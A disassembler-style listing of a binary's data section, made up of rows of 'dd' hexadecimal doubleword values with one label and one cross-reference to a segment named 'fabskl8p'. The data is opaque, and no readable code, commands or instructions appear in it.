dd 0F9C62632h, 0DAE144A1h, 5BEC4FF7h, 23BF507Bh, 44964758h
dd 1454BFA3h, 3DE51B6Eh, 0AA061231h, 0E1426A31h, 8AA6BA0Fh
dd 0F9CB7BF9h, 9CC862Eh, 0F2C65E6Ah, 0D2D754D1h, 0EDAF303Fh
dd 0EB543FBDh, 4D05F8B8h, 1ABB9968h, 1C789562h, 7366F0EDh
dd 934AF29Dh, 0D4894373h, 98C35FB4h, 0A2412FA8h, 0BEFE99E8h
dd 1C319D6Ah, 8441FB71h, 0BE13F8E7h, 35F3B952h, 465E8DE9h
dd 0B2C89E70h, 1CAEC5ACh, 0A6CD6511h, 13D80894h, 0F4B38CDCh
dd 0DC3CBE82h, 905E3A90h, 47073F01h, 0CD3289CBh, 5CC39970h
dd 2A59BA9Ch, 32521D45h, 964F5788h, 633A4A62h, 8D775B96h
dd 4354360Dh, 2A59A8B2h, 0BF197318h, 0FC6D0D8Ah, 0A1D839FEh
dd 9AA1ED05h, 0A087C51Eh, 19D68D62h, 7E3AE73Eh, 0BBB48E4Eh
dd 7CD457E7h, 7D4D7E6Ah
dd 0CF2AC22Eh, 7AF56B17h, 0CFBDD84Dh, 9BC3B353h, 4A34DCDDh
dd 5057FD53h, 7D4C176Dh, 0BA6A4FDCh, 41DC1E54h, 0E156262Dh
dd 9AC7B52Eh, 99FDDAADh, 7B3551B6h, 64D2F069h, 0B678DE75h
dd 0BAE0638Ch, 58244052h, 68B2543Bh, 0C56FCFAFh, 4D356F99h
dd 5D2A45EDh, 4C4115D3h, 0D4EBECCh, 3B789AC3h, 50AE4627h
dd 5FC4CD33h, 77B55C25h, 0FF781ED9h, 0DD2D5392h, 8C128E9Ah
dd 5A572FEFh, 0C9C1C43Bh, 0A13303A8h, 0A2FEC794h, 0A2D13588h
dd 0FFDAD50Eh, 72890854h, 8B7218AAh, 67930F5Fh, 0A3D2D6B9h
dd 5F4397DCh, 0C969099Ch, 8BDC618Dh, 3F19CEA9h, 0E772BECh
dd 0A4760B3Ah, 12C2CE3Ah, 0E6EF9DF9h, 0FC5519B7h, 7F187BA5h
dd 0ADC3F06h, 4B6BA969h, 8110A84Bh, 0CC847C0Ch, 7178B0A5h
dd 77D9707Ch, 0C64B1F0Eh, 0C59E633Ah, 17CB0329h, 89EACFD8h
dd 124D5436h, 0FFD002AFh, 9B790725h, 3691AAC5h, 527A5545h
dd 1754A971h, 0B1102C3Fh, 90FC9B2Ch, 20EC17E3h, 0FA3A2ADDh
dd 9FEE0265h, 5DEDA0ECh, 0C36D5040h, 8336E817h, 0AAC9726Ch
dd 0A7E8BFD8h, 1F261D6Dh, 5E542CEEh, 90CD9AA4h, 25F95FCDh
dd 0F611DDB9h, 0A24EDC0Dh, 0C393507Bh, 3CD4FB6Dh, 0B9324B5Ah
dd 0EB1EEE5Ah, 522095F8h, 0BABAC74Fh, 57917CEEh, 0F68BDAFDh
dd 49EEF9F1h, 0ED74749Bh, 225856D0h, 0D7D650E5h, 0C491BF0Bh
dd 659DB8BAh, 0A9772B77h, 8A493F7Ah, 0BBDA617Ch, 0B262B7D4h
dd 3F5BF523h, 5C87F911h, 3AE6971Dh, 44EEE0A4h, 0E2D68B6Bh
dd 0B4FB3DBCh, 0AAEF1D22h, 8AAF6879h, 0D6F359C9h, 68E1AFB9h
dd 7D06D991h, 0A3356BA6h, 0F9AF6CE8h, 5164A73Eh, 83DF3503h
dd 7312BD73h, 68245D5Eh, 4E9645F5h, 17B9F6B4h, 6F608D8Eh
dd 1B34B757h, 25D4D9F6h, 0D2BFB555h, 76F31AACh, 6703D9EBh
dd 5EA33B88h, 1E7A09C6h, 0C5FCBAFFh, 7A5B513Ah, 573180D3h
dd 3CC658Ah, 0F82E3059h, 33BFAA4Bh, 2B3F5BDDh, 3DDCAA16h
dd 1F2CF760h, 0A5B5CC54h, 2835A746h, 0F91074DEh, 6E284AEh
dd 0C758959Fh, 0F054F68Eh, 5DC26AFBh, 0F0DDC96Ah, 0DF59B381h
dd 9A41B699h, 0A29573DAh, 0D8B2EBADh, 1E9D7A5Fh, 2DF3BA98h
dd 0DB783793h, 8C73BD3Dh, 0A6D19AD9h, 10FCDAABh, 80B84A33h
dd 0C3694CDEh, 0DA0EECD4h, 613C7CA2h, 103696F0h, 0DE531B13h
dd 0EB1ADE99h, 94D4EADBh, 0AC8D244Ah, 85D2824Fh, 0A0B5F9DFh
dd 6320AA18h, 0DB71517h, 6F468B09h, 0AD140ED2h, 4CEACAD5h
dd 47AC2D76h, 9ABAB342h, 0B45437A7h, 37AE79EEh, 1BC0DA19h
dd 0B9BC8529h, 177BF8A2h, 895AB2B0h, 1338350Eh, 73AD84EBh
dd 0DBD33615h, 8ABE34FEh, 1A5F7457h, 0EBD91290h, 6DF677E0h
dd 0F1DFBD02h, 4005F8C3h, 0F3F78E53h, 8ACC4ED1h, 37F8E97Ch
dd 1EC93E5Ch, 0AAB91E34h, 0F80762D0h, 97E0FE4Fh, 0BE8D6906h
dd 0A0377E74h, 0F8D9C7F6h, 96A455A1h, 0BF3A4925h
dword_484560 dd 86EA5DF1h, 0DDDE5B5Ah, 99A3DFCCh, 74E097F3h, 0FAB115F0h
; DATA XREF: fabskl8p:off_41E854o
dd 0EA5EC918h, 23289C9Eh, 0DE28ED7Eh, 556EAC8Dh, 0F2B18339h
dd 0A452BDF9h, 0B41E246Ah, 38B7BC6Bh, 6BAF68BAh, 4E3B5E33h
dd 69CCA640h, 0DDBED476h, 7080E9DEh, 42C2C3D0h, 0F6638A49h
dd 8B097BB7h, 0AFE8DFC9h, 56F074BFh, 43D2A759h, 0B396D155h
dd 0EAE4BAC3h, 0C4B18819h, 0B5A272B6h, 9D2F1731h, 5AE3A57Bh
dd 0C105B1CBh, 67976ACFh, 8855B52Fh, 85D172D1h, 5EA3ACD4h
dd 7F7FA1F8h, 0FC6872Ah, 0FA6F3C4Ch, 6DA3DD35h, 4D7FD69Ch
dd 0AB462C84h, 0C9049693h, 680448CBh, 0CA6AA0A7h, 0C655650h
dd 6EE255A4h, 0F28F1A15h, 7CF6C470h, 7723F570h, 8983BAA7h
dd 5EA2C281h, 4A06BBF9h, 1F86ED8Fh, 56ED54D6h, 26E48750h
dd 3C6C4C3Ch, 719D153Eh, 0B1F2872Fh, 6B23AF8Fh, 12AAAD39h
dd 1B382E6h, 4F803AD7h, 312EBAABh, 0CD4BE241h, 0CBCBFCA1h
dd 0C3BED5BBh, 8CC15168h, 13EEE7C0h, 29568C56h, 1EDD2221h
dd 90690F0Fh, 0D8645927h, 0F7D3DCCDh, 3CBDB05Ch, 671C66E8h
dd 6557C06Eh, 6EDE5467h, 62D8200Ah, 60A74253h, 2557780Bh
dd 313146B3h, 2847C953h, 95F70655h, 0FBB98E70h, 469EEB13h
dd 880C114Ch, 4BC78311h, 83CCAF07h, 5C860C9Fh, 1C17B833h
dd 869F244Fh, 0A26E03D9h, 4BCDF767h, 0A469769h, 9933E972h
dd 0C94D962Dh, 48BB8123h, 8B4C6766h, 55B2A2C0h, 53BB559Dh
dd 3E8DC477h, 432A155Bh, 89A6421Ah, 197FF759h, 6894628Fh
dd 68BC6C13h, 0BF972BF7h, 2B62DC61h, 5EAF38A2h, 0ECAD5E5h
dd 0C4CC855Fh, 314AE95Bh, 954BC919h, 0F50D8B55h, 0F3B9B91Ch
dd 0F7DEF7AFh, 5FDC64C2h, 1BED6239h, 27D3AFAFh, 0A2BD2FBCh
dd 66DA7D35h, 8D57F4E6h, 0F3E4D920h, 800F1100h, 0D3FF2AF9h
dd 0FB1EEB49h, 92B33332h, 0A7089D73h, 323B4C5Ah, 683C4AD7h
dd 40B077E2h, 6B929ADFh, 0C0C2BFAFh, 8F43AF5Dh, 3F77A70Fh
dd 41291897h, 0FE32AEBEh, 6C70B750h, 6C2775D3h, 0ACF1E8A8h
dd 1F2DFA50h, 0DC280BBDh, 5F61D797h, 0C22B2EAFh, 0E7154D1Ch
dd 0B5C29177h, 378B321Dh, 8FEF0B3Bh, 0F66E46ECh, 0EF30C6A3h
dd 0A475AC76h, 1F757AFBh, 1A56036Bh, 0E87C49B2h, 1515FEB5h
dd 199B768Dh, 49914F02h, 15C14635h, 0CD76A11Bh, 1C7B4CA4h
dd 0B7396C95h, 6CED4D32h, 9718702Dh, 375294ACh, 0B707A90Ah
dd 2C930C97h, 0EA895A67h, 1F096F54h, 2A70B3AFh, 7F242484h
dd 0BAB66957h, 41B3230Ch, 0BF2B164Eh, 80D30524h, 0B3E4E642h
dd 88DDF985h, 6ECD50E9h, 0FE95EAFDh, 6F8289AAh, 0EDA7D240h
dd 0DD5467FBh, 8BA6578h, 65AC421Eh, 8E1BF4E6h, 0A7CCD81Fh
dd 732C5D9Bh, 0AC54FA5Fh, 5B6BD691h, 84E6B753h, 611382AEh
dd 223392D4h, 0E8FCEAF0h, 21A4216Fh, 222BB9DBh, 7ED58DD5h
dd 2CE171Dh, 3A3A9342h, 7810F764h, 0B75F546Dh, 0FF41A598h
dd 0E2D1BA2Eh, 0CA69F966h, 0CDEBE51h, 0B64C169Eh, 0DD0B933Bh
dd 55E7EA58h, 4D665498h, 0B838B955h, 736785AFh, 897C19C8h
dd 6BFB92A3h, 0F2E31596h, 0CCB9C1C0h, 0F447649h, 0E9D5A6D3h
dd 7E26D6AAh, 505A9CC8h, 89DDFCF5h, 7D232298h, 4E4CF5F2h
dd 4D5DF07Dh, 0C0C3BF8Bh, 8EF0BC67h, 0B3F87F8h, 0FBD9555Ah
dd 0BDA3BE1Eh, 0CC5A01EAh, 0D6E874FDh, 80511A5h, 0E67013CBh
dd 0D693CC06h, 861D0619h, 57060BF4h, 0E72EE476h, 55695CCAh
dd 5A9E81B1h, 8A15CE08h, 0DADE69B6h, 0CA557202h, 2E140175h
dd 9EE93D1Bh, 44A1AA93h, 77CFB5D1h, 6422F81Fh, 85635A7Dh
dd 4464D1DBh, 40A6D7Ch, 5EB1807Ch, 0D4AA7529h, 455F0E72h
dd 0D3AC12BEh, 0E6D825D1h, 63D953FDh, 6C5BBFB2h, 8D0CAD10h
dd 762BBCC8h, 27DF98F7h, 0B479E3FAh, 37358E14h, 0F4F87A0Dh
dd 0E5E77FF2h, 0C73643CAh, 0B9FDCF0Dh, 288A2EC7h, 0ABA4A963h
dd 0BA98418Dh, 0C028C3F1h, 3CDD83EEh, 0F8844A35h, 30D52EA1h
dd 5410B5D7h, 0ABE0C4E1h, 63B913D8h, 8D1F982Eh, 81F17DE7h
dd 0FF7292ABh, 91E8FCC9h, 0FF038CBCh, 75AFFF2Eh, 5E70555Bh
dd 2BDEBC67h, 0B39A33FDh, 4C7B6E32h, 0F638ED31h, 6DBA6F4h
dd 470FC354h, 0FC70E7Ch, 0B7D395CFh, 4557BA19h, 11F8B9D2h
dd 97D60603h, 0C2B582F5h, 0A3AA3E4Bh, 0AF36CF16h, 0CC055628h
dd 95C6885Dh, 53AD0C6Bh, 1C7766E2h, 904B1E6Fh, 6A2018F5h
dd 0BAC6BA91h, 6E55706Dh, 0E96A5ECBh, 0AB257266h, 70C6D928h
dd 1BC078Eh, 63AB30D3h, 0D7ADDA78h, 33C86E26h, 0B2975EEFh
dd 0ADCB6124h, 5E0947F8h, 0B4DCEFE6h, 7C2DDA35h, 0D1BE5B2Ah
dd 0E26E3D5Eh, 9FDD8B76h, 0E36B12h, 44A00255h, 75A5DBFEh
dd 0B5D3378Dh, 11665688h, 0EF6D8AAEh, 4962C3A0h, 8BFB70A8h
dd 28E054FFh, 0A9CC6C00h, 0D6CE604Fh, 0CC50F68Dh, 14C6C579h
dd 2A21D6Ch, 0B8EA680Ah, 43A2009Bh, 474ADF3Fh, 8DAED51Bh
dd 63B50577h, 4FAD5744h, 0C54B2E73h, 69C6FDDDh, 994C29BCh
dd 7303B245h, 0C8E86CEFh, 44A2C0F0h, 1A665A0Bh, 0B234B8DCh
dd 0DEC2ECCAh, 0ADB7B128h, 0DE63D1A6h, 6366A29Ch, 703B4FE4h
dd 5DFBD0F3h, 5D484D82h, 1B784559h, 857562C4h, 9E7EDD4Ah
dd 52D87859h, 52D1D4A9h, 6DDFDA24h, 0B63793C7h, 197BF3DFh
dd 579FFFBFh, 19F0AF62h, 9E62C43Fh, 0A52892AEh, 1883BE6h
dd 0B70052D2h, 0C2A9C6CDh, 0ACCFABEEh, 0C7420D8h, 3F7807D5h
dd 0F5A9B329h, 0A9991931h, 9A1BE20Ch, 15A3B279h, 9236FB14h
dd 5CC33D61h, 0F4A0E4D8h, 0CDBD3609h, 33BAE261h, 90DA4B17h
dd 998958D7h, 2AA5ACB0h, 0AAA9B3E2h, 6B325AD1h, 0E7AB43A8h
dd 95588DEDh, 0FD7FCB0Dh, 0BFDB5225h, 0A6DE9DC4h, 1313478Bh
dd 5C0B606Bh, 3C1BC49h, 0A8578D77h, 0D39FDA45h, 32407DD4h
dd 3B855998h, 71F75AF1h, 2877CD6h, 0E3B83F15h, 2DEB3314h
dd 0DC67FFA4h, 278B1527h, 0FC8E79D5h, 0C29D4709h, 5E5A2EE0h
dd 1FE7D9B6h, 0A736C88Dh, 5DC9AEADh, 91A671DAh, 0DC60F569h
dd 267FACB2h, 7B57E254h, 1D99DB53h, 9E7BEBD9h, 0E6EEC402h
dd 7B514C29h, 0D0718CECh, 0D74768A6h, 0F158DAAAh, 80188581h
dd 2E3DAAFDh, 1849E578h, 1FD9BBA8h, 0EF2F2515h, 0F3A673F9h
dd 8E31CB1Ch, 43B3CD0Ah, 0B5BD0BDh, 26D168D4h, 0B34C2204h
dd 5A8469E8h, 0FCB3D375h, 49CABD0Bh, 0A6372377h, 793BA0Fh
dd 0C08DE286h, 640E468Ch, 303E97EFh, 0CB05C5BCh, 61F56F07h
dd 3B9A071Bh, 2B3EDB9Ch, 303E557Dh, 9FDBF7F8h, 0F3AB38B7h
dd 32B6B82Fh, 39EAC22Dh, 33C36088h, 4D0125B5h, 0A1F8D175h
dd 957E88F5h, 0FC7F1AD4h, 357416C7h, 0FC7FCA89h, 0DB91AD27h
dd 0FA0CC51Eh, 0CD5D20C0h, 0B3FD9F9Ch, 3A8C7CDDh, 622D6ABCh
dd 0C0C0D1ACh, 50C0261Bh, 958AB959h, 133AF634h, 18D0459Bh
dd 6F90E8F8h, 0D8EA4BACh, 7972AC97h, 5A8AA05Dh, 5957202Bh
dd 0F91D87EDh, 6A166FF8h, 0CDC276F1h, 9E269F03h, 544DC86Eh
dd 0F6858B0Eh, 9350C116h, 0C4867743h, 67C977AAh, 5FDCE417h
dd 716C3486h, 8C4EA927h, 57FA5AB3h, 8C5DF574h, 92BFF22Fh
dd 21F0984Bh, 0D60C1C89h, 3AF2BAADh, 0E99B0120h, 86C6E9CAh
dd 7F665689h, 75BF0333h, 92C0CEE4h, 339CDF5Bh, 4DC7380Eh
dd 0A753399Fh, 0B6A6E348h, 2F183C8Bh, 0DF3318B7h, 0ED762686h
dd 0E94FB3BBh, 3598925Eh, 37A9F3BEh, 11FA6A53h, 3021542Dh
dd 86888ED6h, 0FD0731B6h, 963A6792h, 1D376A35h, 20C9C742h
dd 106C34E6h, 0FE242F95h
dd 0A1BF38CAh, 0E12F49A6h, 0FD04B88Dh, 565C7615h, 433F1AA1h
dd 49E6C168h, 0DDDD250Bh, 2AA2B42Dh, 0B5987F6Dh, 8E4CBAB3h
dd 38552659h, 83256E03h, 5DD92702h, 99A3EE5Bh, 569ED24Ch
dd 81F1FE7Dh, 3E4AAF4Ah, 8B4E6B05h, 1131BF45h, 81D236C7h
dd 7C6A9527h, 0AB0E67C0h, 2D910F7Fh, 0BE07A0D4h, 0AF67D3EEh
dd 35D0BF2Fh, 6B992ED1h, 0F23EA23Bh, 0D4DFF22Bh, 625312E4h
dd 13C5D2C5h, 7F43C65Ch, 12BC5C79h, 0A6653D6Eh, 67BA9C24h
dd 10446886h, 0FC9C7BC7h, 9BE4F442h, 0A4EE771Dh, 69B8A9A1h
dd 71F8518h, 0E0F8E961h, 6F60BADh, 0F72AA04Bh, 2128327Ah
dd 78952964h, 8FB15EFDh, 0F39121BBh, 1877E7Fh, 879198EEh
dd 0EDF463C7h, 9088BFD8h, 0BFB05DF2h, 2293F6DAh, 27563326h
dd 0ECC658F9h, 0AB37C6F9h, 0FC3E410h, 5F05169Eh, 0C3ED7F0h
dd 81FECF99h, 530C3715h, 6D13DFA7h, 91F74BDDh, 42AE39C3h
dd 8AF9AAF7h, 8190F211h, 0B5FD4024h, 0AA8D93E1h, 0B832C070h
dd 95A6AD57h, 0BAF1F629h, 3CB44B10h, 52CE3F9Ah, 3502ADC3h
dd 768FD25Fh, 2F8309A8h, 3B6D28DDh, 3223EA7Eh, 745BFFD4h
dd 0EEA29D13h, 39C3456Eh, 66B36299h, 9D38D373h, 8D5F0CEFh
dd 70FE3315h, 54B9C67h, 0C3F1E85Fh, 877316B2h, 370BE59Fh
dd 11E81732h, 8AD37FCBh, 7DE18D59h, 0CBE3C548h, 0FC1EACF2h
dd 0BBD65712h, 206BA6FAh, 0A56E2C4Ah, 0ED18E307h, 2FA967CFh
dd 1FB81FECh, 0EC0B9C42h, 0F58DBABAh, 2D1924CEh, 0E7CDA2F8h
dd 0CA9D828h, 4FBA6FEBh, 45F0BE83h, 0DE324CB5h, 4B413C8Fh
dd 0E1A4B715h, 5B2FCD87h, 2293DD35h, 70A94554h, 7E312901h
dd 2B754B45h, 0DDE04FF2h, 0F3186522h, 67FB0C58h, 0C9D92746h
dd 0B93EB98Ah, 0C6B515A2h, 9B414FFh, 0F37548BDh, 0D6810A6Ah
dd 0DFFA1912h, 0AFD3C7EEh, 1C700974h, 3303E58h, 13A777DAh
dd 0D5B2687Eh, 0DD14F40Ch, 0C982DE0Fh, 0BEE21386h, 0E84D985Dh
dd 56C7A262h, 536A402h, 977E106Fh, 0BFDA8A48h, 3F130F97h
dd 2084ABFCh, 783ED177h, 6D75F240h, 0D64FE8B5h, 9C54874h
dd 0DCE5C5D2h, 0D17405BDh, 2B2E5E3Ch, 0D45EB513h, 0FB4662D4h
dd 0CAD3A4D4h, 0E6FB7F4Eh, 0EB0D6975h, 9C4C9A37h, 0F5152EB3h
dd 6CF0230Eh, 4E625AB3h, 162A950Bh, 1241C021h, 0E4ED2FF9h
dd 4AD95164h, 0B2ABC16Bh, 0B18EEDD5h, 1D93823Dh, 9FBC6F77h
dd 0C3030C89h, 0CBFB0F82h, 4F4EF9F7h, 0B4C5B411h, 72A5C7D5h
dd 0EE4DB2FFh, 0D7DFBE0Ah, 0FB54094Dh, 0B32F875Fh, 92ACEAC9h
dd 0CF60DBCAh, 584D1EE3h, 5F82D818h, 0E99EFAEh, 3A74733Bh
dd 383BB97h, 0BFC8753h, 4A52C5A1h, 739C707Ch, 0F9F7868Ah
dd 0B9EAAF97h, 0BA7466D3h, 755A940Dh, 575173E8h, 0F5FE2B6Ch
dd 9F5F306Fh, 87219267h, 44276794h, 342E56CCh, 0DAD005FCh
dd 0C869CFCEh, 9056014Ch, 8E2BB040h, 4EFB410Dh, 83EAB209h
dd 26C9B68Ch, 71F92E29h, 0A1CF43F0h, 83A522D4h, 0B5F3555Ah
dd 0F408F2Ah, 4649D4B2h, 0ABF2F40Ah, 0A15C8EA4h, 90A375C0h
dd 0E77FE3BDh, 955EFBD4h, 0EF97AC78h, 5CCF000Fh, 177536A2h
dd 91AAB0Bh, 1977E7B5h, 10BF26ABh, 0F8D5FB3Eh, 77317A52h
dd 2BCFA12Ah, 2B53E861h, 0B46BF6Ah, 6D3E6415h, 61F8E17Dh
dd 2D8AA947h, 628AFD7Dh, 14C32964h, 0D2F977D5h, 0E8F3851Fh
dd 53DC9063h, 6563F932h, 0CACAD81Eh, 0E6A9555h, 9D963794h
dd 0CD7DA285h, 7BB4A042h, 4FCDF831h, 232451F4h, 0E995FD28h
dd 0DC891469h, 0FFA65584h, 0C1C5FE14h, 5D52221Ah, 76C6110Eh
dd 0D46EC791h, 3E04D1F6h, 0E46F0F22h, 0D5439F28h, 52200CB7h
dd 0E3689451h, 44559405h, 0C25323D1h, 69F1F3E9h, 2CF0FE45h
dd 0FFF7ADC2h, 0A4A81E2Ah, 693D86AEh, 858E4199h, 0E3514FDCh
dd 2556FB61h, 0C751BEAEh, 0B93E488Bh, 0B56FD7E0h, 9E170C9Fh
dd 0FEFE1C05h, 0DD9A19F4h, 5D510F31h, 0FCEF42C2h, 70DA5D86h
dd 35E07B55h, 0C96B5D7h, 0C3B3D967h, 57E8816Ah, 0D6CDCB8Eh
dd 0F07964DFh, 0B6289DE7h, 631A2E63h, 9593DEEFh, 68C785E4h
dd 0D545E2A3h, 0E7A6F9E1h, 63E0940Ah, 2EF36E32h, 7600F3F0h
dd 0A0C8649Fh, 0C4A452D1h, 7E89D31Ah, 5D6264D5h, 9380D9C1h
dd 0A57D5DC8h, 1E141150h, 3BD061BCh, 31470809h, 0C2FBFB0Fh
dd 85189680h, 0BE42AB9h, 0D80CD780h, 0DCBEACD3h, 476B8747h
dd 3A8680BEh, 0A2DC50DDh, 95530A66h, 595A31B0h, 63AEF1F4h
dd 0DA1CAB51h, 0E6012BE7h, 2748BB3Eh, 0B155AAEBh, 4FD499F4h
dd 0C7E05FBFh, 3F0DEF09h, 0EC024D4Fh, 256415D2h, 5253A6A6h
dd 9A1FB645h, 0DCD46907h, 4A11818Ch, 0B3A31105h, 0BC43C55Dh
dd 0BD93FD99h, 3727F1B9h, 647C276Dh, 0FEFBE84h, 0AAB65E0Ch
dd 38CA8935h, 0D2DD177h, 56D70AC3h, 0A0D61793h, 0AA29DAC8h
dd 3DBA89D2h, 0D877290Ah, 56755F62h, 6B56F253h, 0DAD1F9F7h
dd 5FBE45A0h, 1D495CDBh, 0EABE2ABBh, 4008C2C9h, 574EFA86h
dd 73A1759Dh, 71B60CB5h, 0EFD5F8C2h, 23FDAED3h, 0F1A37595h
dd 7CD4825Fh, 0F8072D0Ah, 9E469640h, 1A1791EAh, 68098084h
dd 0E8EB157Fh, 0AD953FD8h, 93F0C160h, 0ED4C21CCh, 1E0ADF61h
dd 0CF5A5F1Dh, 7DCB212Bh, 0BCA0D121h, 0BF3CF93Bh, 7B7CF422h
dd 0F52C494Ah, 8DA7A05Ah, 34BFC978h, 75B69894h, 0FD87D500h
dd 7BA9DBB7h, 69F291B2h, 0CD6154B4h, 2F84366Bh, 1E945441h
dd 18D1D673h, 0EFB0B4ECh, 7E8FD4DAh, 17291B96h, 343B751Bh
dd 0E0BF5B6Eh, 0E3E38B57h, 9FCB878Dh, 0AAA1C85Ch, 0DFDE3C3Bh
dd 5B59CB57h, 537D6BA2h, 8DC39370h, 6D55B45Ah, 8855DCCAh
dd 0D14B2D43h, 0FB2F3E5Ch, 93F23298h, 0C29B3D07h, 3D82AB1Eh
dd 9B7E8D76h, 25A7C87Ch, 0E93F2AABh, 465CFA3Dh, 94CA86C9h
dd 7A568A88h, 89777B8Ah, 3533B5Ah, 986885A0h, 9639C6A4h
dd 0D3052135h, 0FB6E0C89h, 33FE6729h, 1499FA1Ch, 0DB35D2A1h
dd 0EB5AAEFDh, 0B756A351h, 83E60E4Ch, 52591F83h, 50959753h
dd 2915C0F1h, 4756E212h, 565A88F7h, 2F4DAA99h, 0AF91202Ah
dd 0AB0919F7h, 0D5979FCh, 4DF41C4Bh, 0F2CB7082h, 0DCCAED2Ah
dd 0E405F247h, 0F194AA0Dh, 90C07E9Dh, 7DA0FEC9h, 0FD5893C1h
dd 0F1DA4B97h, 0B2D1E7C3h, 0FE78E7B1h, 8C691995h, 6C4E8085h
dd 0DF74907Dh, 15B1F870h, 0ABD6581Ah, 4A0F6806h, 0FDF59DB0h
dd 0C5A6B2C0h, 28B99C6Dh, 97C01EC5h, 0DB459995h, 0B8F921A0h
dd 0AA56FB2Bh, 5A2E5CE5h, 5290E5C6h, 75C6CEA6h, 0B525C238h
dd 19F7152Ah, 8FF17C63h, 0D4113E0Ah, 0EA051627h, 409EEFADh
dd 96A67363h, 476573B2h, 0AACA4A8Bh, 24CE7FC3h, 0A37FAB0Bh
dd 8ED646CBh, 0E662836h, 0FDE003BBh, 2214E8E4h, 231EF4BCh
dd 0ABD7E9A7h, 0CB258536h, 0AFB6B528h, 1913DA3Ah, 33B12E50h
dd 525F1910h, 0DD87491Ah, 8DF194CFh, 0A265052Bh, 0BCEAA440h
dd 59B58F72h, 0A6851FC5h, 10FC5272h, 0F59F60ABh, 0EB1C0F49h
dd 0FBEE749Eh, 0B35DB353h, 8F215F88h, 7A9B9578h, 0ABC8B4E8h
dd 0F972616Eh, 2AA4E045h, 5CDAEE8Fh, 0AA05FE7h, 17595E66h
dd 0A3288A76h, 5BB87E04h, 0C527C842h, 46E66FEDh, 98CE6557h
dd 8DC4ADC5h, 0D3EF3952h, 5E5999A7h, 0A4639AE6h, 776FF84Eh
dd 0CC681DA1h, 0F8AFDF26h, 99CD8615h, 5FDF39D1h, 76FADA74h
dd 862BB5F6h, 0E28B6C96h, 0EE1C5CC9h, 3D74BB67h, 0FE9937DDh
dd 0A310FAE1h, 7C4A0690h, 0EA8D6BC5h, 33D32176h, 59C50048h
dd 0BD3A4D9Eh, 99A8C27Fh
dd 0AAD22902h, 50157EDFh, 2EF49303h, 7B13DC7Dh, 4D34BDB7h
dd 656ED304h, 78D80D77h, 62088860h, 6D3AEA1Eh, 803DFF72h
dd 7DBF82BBh, 6D2A8D0Bh, 0CC5F9DF0h, 29C5018Dh, 4D420B33h
dd 0E06544FCh, 0DF6002C5h, 4D9D5B3h, 0DF8CD725h, 0DDA909E6h
dd 0F78409FAh, 32EECC54h, 0A3F3A0FEh, 431D7985h, 73B8CE92h
dd 41B5B4BAh, 0FC6C5AFh, 0D2847C5h, 0D69F6AE2h, 4BC75D2Eh
dd 0AA70259Bh, 52D150C3h, 0BC833586h, 2718190Bh, 0A687032Ah
dd 0CA98C87h, 4B2BAF9Dh, 47F55299h, 0C04571Bh, 278D90B2h
dd 3B179418h, 94669BAh, 0A35DD7Ah, 14D3B6B5h, 5EBFB1DDh
dd 0CC3E9111h, 0BBD227F3h, 3F587716h, 0D07BDCEFh, 0A74AB1A9h
dd 0EB1255A2h, 86FA0D6h, 0F342B572h, 0D6F5CFC6h, 0E22F4216h
dd 41645587h, 0FB2790A7h, 4DE5FDEDh, 6AAD1926h, 6E5F45A7h
dd 680A68E4h, 822FC8Dh, 0ED26EE1Bh, 17223402h, 6D611B3Ah
dd 720D36CEh, 0EF7D5F9Fh, 0C83A3657h, 0E5A26695h, 6765BF7Bh
dd 1473BDBDh, 0F2B2B427h, 0F902522Fh, 46F8A0F8h, 23FB71F7h
dd 9A544F1Dh, 7AFE9B64h, 7CD27131h, 60B572D1h, 1C824461h
dd 0BE277AA9h, 0FBF7E128h, 8BFAB973h, 0C915D37Bh, 0AE3A57Dh
dd 55DE18BFh, 47C628C0h, 26C656DAh, 6BF0AF84h, 0BAB7F1B5h
dd 74C3E3F6h, 0F73755F6h, 39A544A2h, 0F75D1A8Bh, 1DEEC5F7h
dd 4B9BA9A1h, 86CF07E4h, 0E4B49F80h, 0EA354E37h, 0AE0B7860h
dd 0F53BA979h, 0ECE425AEh, 7A399E3Bh, 50DF053Eh, 19BB4C4h
dd 0EFC1ECA8h, 0BFABBF27h, 6FD2DC70h, 35B6D32Dh, 0C3C52252h
dd 34908F94h, 130C6A56h, 0CAF8A70Eh, 903A5522h, 0F84AA010h
dd 6D56BA52h, 0A5B156BEh, 2AECD16Eh, 5E52C8DBh, 0B7BCF8Dh
dd 673C9B1Fh, 0E52853E1h, 7B2FEB3Ah, 89F29D0Ch, 0EB2B49B7h
dd 0BBF6DE13h, 15C125B7h, 0A1F897F6h, 4C24F046h, 26862CCCh
dd 2D7CEA7Ch, 0F6ECCD7Eh, 4ED081D3h, 0D5743B16h, 0F6F32840h
dd 76E1A7D0h, 12AB57EDh, 2E51E56Bh, 0C16E6A1Dh, 0D41D98C2h
dd 8738DEF5h, 0EA7D2C79h, 5113B6AAh, 0ED8A9327h, 4DE28A5Fh
dd 55AE24AAh, 328A3557h, 13BF6459h, 1CCCB8C1h, 0EE265AB6h
dd 0B15B675Dh, 3266A6C2h, 0B9EFCAD3h, 6A374AC7h, 17E30664h
dd 0DE5551FCh, 2E2E682Fh, 0FEC543A5h, 0E675DBC5h, 0C989E861h
dd 0A478CA84h, 4472870Fh, 58BBA127h, 35D2E36Bh, 41DA2C5Fh
dd 0D8BC2E47h, 3398DBCCh, 944969F9h, 5C3CEAD2h, 63BBD85h
dd 26C556B7h, 0FA6DF513h, 0E7AB1248h, 82102A04h, 64666C27h
dd 995AABA5h, 0D121F1E1h, 69EB7766h, 0D99BCF78h, 7563F725h
dd 56AD3146h, 68F4A615h, 1B9132A3h, 8CF89223h, 0B89CF131h
dd 96894BA0h, 7893ECD7h, 0B06FF962h, 0EA6C68B9h, 26D64207h
dd 0E49D478Ah, 656C223Ch, 0D2107314h, 0AA79D4ADh, 39536CA6h
dd 232EB4ADh, 146DA75Ah, 0A77790B4h, 0C59D6773h, 8FF00A43h
dd 59BECE54h, 720DFAF1h, 2E58B995h, 6EEE21E8h, 0E29A164Bh
dd 0AA456929h, 0E822E53Ah, 0F60B970h, 4DC62E4Ah, 2BF8797Ch
dd 3B2A4F3Fh, 70DD5A36h, 8C3971Dh, 6B3B3BB3h, 6B69B3DDh
dd 67106EA1h, 0F44A3D6Ch, 7E3EC899h, 0CD734CDh, 16351960h
dd 5681C323h, 0F998DCAEh, 1318C8D6h, 2F6CCC3Fh, 0E2EBE0BAh
dd 0C7BD160h, 1FC5C74h, 3A668D21h, 554F4AFBh, 984F68FBh
dd 0DEAB6598h, 0AEA0157Dh, 53553BFDh, 84FBC67Ah, 9ECADF1Ch
